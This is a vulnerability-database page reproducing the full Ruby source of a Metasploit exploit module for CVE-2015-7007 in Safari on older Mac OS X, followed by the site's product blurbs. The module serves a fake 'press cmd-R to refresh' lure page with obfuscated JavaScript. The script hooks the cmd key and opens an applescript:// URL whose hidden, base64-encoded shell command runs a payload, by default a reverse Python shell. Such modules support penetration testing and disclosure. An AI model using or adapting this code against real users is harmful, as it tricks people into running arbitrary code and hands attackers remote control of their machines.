Lucene search
K

Safari User-Assisted Applescript Exec Attack

🗓️ 22 Oct 2015 14:46:56Reported by joev <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 26 Views

Safari User-Assisted Applescript Exec Attack in Mac OS X before 10.11.

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Safari User-Assisted Applescript Exec Attack',
      'Description'    => %q{
        In versions of Mac OS X before 10.11.1, the applescript:// URL
        scheme is provided, which opens the provided script in the Applescript
        Editor. Pressing cmd-R in the Editor executes the code without any
        additional confirmation from the user. By getting the user to press
        cmd-R in Safari, and by hooking the cmd-key keypress event, a user
        can be tricked into running arbitrary Applescript code.

        Gatekeeper should be disabled from Security & Privacy in order to
        avoid the unidentified Developer prompt.
      },
      'License'         => MSF_LICENSE,
      'Arch'            => ARCH_CMD,
      'Platform'        => ['unix', 'osx'],
      'Compat'          =>
        {
          'PayloadType' => 'cmd'
        },
      'Targets'         =>
        [
          [ 'Mac OS X', {} ]
        ],
      'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
      'DefaultTarget'   => 0,
      'DisclosureDate'  => '2015-10-16',
      'Author'          => [ 'joev' ],
      'References'     =>
        [
          [ 'CVE', '2015-7007' ],
          [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
        ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::SAFARI,
        :os_name => OperatingSystems::Match::MAC_OSX
      }
    ))

    register_options([
      OptString.new('CONTENT', [false, "Content to display in browser",
        "This page has failed to load. Press cmd-R to refresh."]),
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ])
  end

  def on_request_exploit(cli, request, profile)
    print_status("Sending #{self.name}")
    send_response_html(cli, exploit_html)
  end

  def exploit_html
    "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
  end

  def exploit_js
    js_obfuscate %Q|
      var as = Array(150).join("\\n") +
        'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
      var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
      window.onkeydown = function(e) {
        if (e.keyCode == 91) {
          window.location = url;
        }
      };
    |
  end

  def sh
    'killall "Script Editor"; nohup ' + payload.encoded
  end

  def content
    datastore['CONTENT']
  end


end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation